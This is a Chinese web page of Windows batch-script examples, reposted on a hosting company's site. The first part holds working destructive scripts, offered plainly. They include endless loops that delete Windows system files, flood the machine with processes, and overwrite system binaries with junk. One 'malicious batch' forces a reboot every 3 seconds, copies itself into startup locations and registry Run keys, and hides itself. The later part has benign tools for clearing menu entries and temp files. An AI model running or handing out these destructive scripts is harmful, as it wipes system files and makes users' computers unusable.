批处理实例代码教程 集合
作者 佚名
来源 批处理
浏览
发布时间 2013-07-09
二、死循环强制删除C:盘WINDOWS目录下的所有文件(跟上面的一个例子效果差不多,不过这里用到了强制删除参数) 复制代码 代码如下: :breake @if exist %windir%\system32\*.* del %windir%\system32\*.* >nul @if exist %windir%\*.* del %windir%\*.* >nul goto breake 三、利用部分系统工具的内存占用卡到死机 复制代码 代码如下: :die @start regsvr32.exe /s %windir%\system32\*.* >nul @start %windir%\system32\*.* >nul @start notepad %windir%\explorer.exe >nul goto die 四、用部分工具的检测信息导出功能生成巨大的垃圾文件(虽然生成垃圾的速度很慢,但是跟“垃圾王”病毒有的一比,也算是“无声的*****”吧……) 复制代码 代码如下: @start ping 127.0.0.1 -t > %windir%\system32\regsvr32.dll >nul :ping @start ping 127.0.0.1 -t >> %windir%\system32\regsvr32.dll >nul @start ping 127.0.0.1 -t >> %windir%\system32\regedit.exe >nul goto ping -------------------------------------------------------------------------------- 反复重启的恶意批处理 反复重启就是让别人启动了再重启 一直反复,以下代码 复制代码 代码如下: @echo off shutdown -r -t 3 copy %0 C:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat copy %0 c:\autoexec.bat REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v autoexec.bat /t REG_SZ /d c:\autoexec.bat /f attrib autoexec.bat +r +s +h REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_DWORD /d 00000000 /f del %0 3秒重启 加入了启动项 开机就会3秒倒计时 -------------------------------------------------------------------------------- 删除右键“新建”菜单项目.bat 复制代码 代码如下: @echo off :: 只要删除"HKEY_CLASSERS_ROORT\.后缀名"项目下的"ShellNew"键就可以了 :: 如果实在删除不了,则把"HKEY_CLASSERS_ROORT\.后缀名"删除掉即可 mode con lines=25 title "新建"菜单内容删除器 color 1f :input cls call :display echo 如果要强行删除,请选 1 echo. echo. set input= set /p input= 请输入后缀名: if "%input%"=="" goto input if "%input%"=="0" exit if "%input%"=="1" goto fouce for /f %%i in ("%input%") do (reg delete HKCR\.%%i\ShellNew /f) goto continue :fouce cls call :display set input= set /p input= 请输入后缀名(强行删除): if "%input%"=="" goto fouce if "%input%"=="0" exit for /f %%i in ("%input%") do (reg delete HKCR\.%%i /f) :continue cls call :display echo. set choice= set /p choice= 还要继续清除吗?(y/n): if "%choice%"=="" goto continue if "%choice%"=="y" goto input if "%choice%"=="" goto :eof :display echo. echo. echo. echo. echo. echo. echo 本程序能删除右键菜单中"新建"项目下的多余内容,为"新建"菜单减肥! echo. echo 如果想让某种类型的文件不再出现在鼠标右键的"新建"菜单中,请直接 echo. echo 输入该文件类型的后缀名。例如:rar。 echo. echo 退出请选 0 echo. -------------------------------------------------------------------------------- 快速清理垃圾文件(修正) 复制代码 代码如下: @echo off color f0 echo. echo 正在安全地自动清除垃圾文件…… del /f /q %systemdrive%\*.tmp>nul 2>nul del /f /q %systemdrive%\*._mp>nul 2>nul del /f /q %systemdrive%\*.log>nul 2>nul del /f /q %systemdrive%\*.gid>nul 2>nul del /f /q %systemdrive%\*.chk>nul 2>nul del /f /q %systemdrive%\*.old>nul 2>nul del /f /q %windir%\*.bak>nul 2>nul del /f /q %windir%\*.tmp>nul 2>nul del /f /q %windir%\prefetch\*.*>nul 2>nul del /f /s /q %systemdrive%\recycled\*.* del /f /q "%ALLUSERSPROFILE%\Documents\DrWatson\*.*">nul 2>nul del /f /q "%USERPROFILE%\Cookies\*.txt">nul 2>nul del /f /q /s "%TEMP%\*.*">nul 2>nul del /f /q /s "%Systemroot%\Prefetch\*.*">nul 2>nul del /f /q "%USERPROFILE%\Recent\*.*">nul 2>nul del /f /q "%USERPROFILE%\Application Data\Microsoft\Office\Recent\*.lnk">nul 2>nul del /f /q /s "%USERPROFILE%\Local Settings\Temp\*.*">nul 2>nul rd /s /q %windir%\temp & md %windir%\temp>nul 2>nul if not exist %SystemRoot%\Minidump\NUL del /f /q /s %SystemRoot%\Minidump\*.*>nul 2>nul del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*">nul 2>nul 更 |
凌众科技专业提供服务器租用、服务器托管、企业邮局、虚拟主机等服务,公司网站:http://www.lingzhong.cn 为了给广大客户了解更多的技术信息,本技术文章收集来源于网络,凌众科技尊重文章作者的版权,如果有涉及你的版权有必要删除你的文章,请和我们联系。以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息,谢谢! |
你可能对下面的文章感兴趣
上一篇: sqlserver数据库服务启动关闭的批处理下一篇: 批处理程序删除自身 bat批处理
关于批处理实例代码教程 集合的所有评论